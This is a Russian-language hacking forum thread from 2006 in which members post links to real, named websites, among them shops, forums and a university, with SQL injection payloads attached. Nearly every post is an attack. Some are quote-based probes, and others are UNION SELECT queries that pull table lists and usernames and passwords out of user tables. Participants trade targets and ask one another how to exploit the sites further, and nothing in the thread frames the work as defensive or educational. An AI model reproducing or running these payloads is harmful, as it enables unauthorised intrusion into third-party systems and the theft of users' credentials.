SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. aleks28

    aleks28 New Member

    Joined:
    16 Sep 2006
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -1
    http://www.alparysoft.ru/products.php?id=10&item=-1'
     
  2. aleks28

    aleks28 New Member

    Joined:
    16 Sep 2006
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -1
    _http://www.flirtanica.ru/articles1.php?id=35'
     
  3. aleks28

    aleks28 New Member

    Joined:
    16 Sep 2006
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -1
    Не могу найти количество полей...... Пошел по другому пути и тут проблемы....
    Пробуйте мож у кого получиться... если получиться отпишись!
    http://artflash.guelman.ru/profile.php?l=ru&id=-1'%20or%20password!=uname%20or%20id='-1
     
  4. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    http://www.flirtanica.ru/articles1.php?id=-10+union+select+1,adres,3,4,price+from+party+where+id=264/*
    а во втором разве есть скуль? ошибка где ?
     
    _________________________
    3 people like this.
  5. aleks28

    aleks28 New Member

    Joined:
    16 Sep 2006
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -1
    Ошибка не отображается, но она есть...
    Она обрабатывается самим php
     
  6. aleks28

    aleks28 New Member

    Joined:
    16 Sep 2006
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -1
    http://www.zooclub.ru/indexr.php?id=4'
     
  7. aleks28

    aleks28 New Member

    Joined:
    16 Sep 2006
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -1
    http://www.gelezo.net/files.php?id=-1'
     
  8. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    у кого получится ковырнуть дальше, скиньте плз примеры в ПМ
    PostgreSQL 7.3.4 on i386-portbld-freebsd4.8, compiled by GCC 2.95.4

    _http://www.littlegirl.tv/cgi-bin/message.cgi?p=-19+UNION+SELECT+1,'2',tablename+from+pg_tables+where+tablename+not+in+('agency_banner_click','agency_mst','campaign','domain','domain2','errmsg_mst','errmsg_mst','errmsg_mst','mail_template','nyukin','option','pg_aggregate','pg_am','pg_amop','pg_amproc','pg_attrdef','pg_attribute','pg_cast','pg_class','pg_conversion')--
     
    2 people like this.
  9. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    _http://www.formicarium.pl/open.php?p=artykuly&dzial=1&art=-49+union+select+null,username,user_password+from+phpbb_users+where+user_level=1
     
  10. T3st3R

    T3st3R New Member

    Joined:
    17 Jul 2006
    Messages:
    12
    Likes Received:
    3
    Reputations:
    3
    http://www.neotstoy.ru/?news&read=-44fc2de67f249'%20union%20select%201,2,3,'user',5,6,7,8,9,10,11%20/*
    банально хз чё дальше с ним делать)
     
  11. CyberPunk

    CyberPunk Elder - Старейшина

    Joined:
    25 May 2006
    Messages:
    115
    Likes Received:
    38
    Reputations:
    10
    http://j-a.ru/galleryvech.php?name_gall=1'
     
  12. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    http://www.saworship.com/article-page.php?ID=-2875

    39 columns
     
  13. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Вот SQL-injection на государственном Универе

     
  14. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    http://www.grovesinternet.com/stormtrack/product.asp?categoryid=777
     
  15. TreniX

    TreniX Elder - Старейшина

    Joined:
    27 May 2006
    Messages:
    19
    Likes Received:
    25
    Reputations:
    26
    http://referat.com.ua/referat_show.php?id=1068325882'union+select+null,null,null,null,null,null,null/*
     
    #55 TreniX, 29 Sep 2006
    Last edited: 30 Sep 2006
  16. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    какая то хрень с кавычками
    _http://www.galicianet.com/foros/default2.asp?IDMensaje=5701+UNION+ALL+SELECT+1,table_name,null,null,null,null,null,null,null,null,null+from+information_schema.tables--
     
  17. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    http://www.kazanova.com.ua/product.php?id=-296+UNION+SELECT+1,2,password,4,5,6,7,8,9,10,11,12,13,14+from+users/*
     
  18. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Вот еще одна, полноценная, пользуйтесь на здоровье
     
    4 people like this.
  19. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    http://forum.vbios.com/addons/kit/serverinfo.php?id=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null%20/*
     
  20. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    http://binet.com.ua/dir/index.php?cat=-1'%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null/*
     
Thread Status:
Not open for further replies.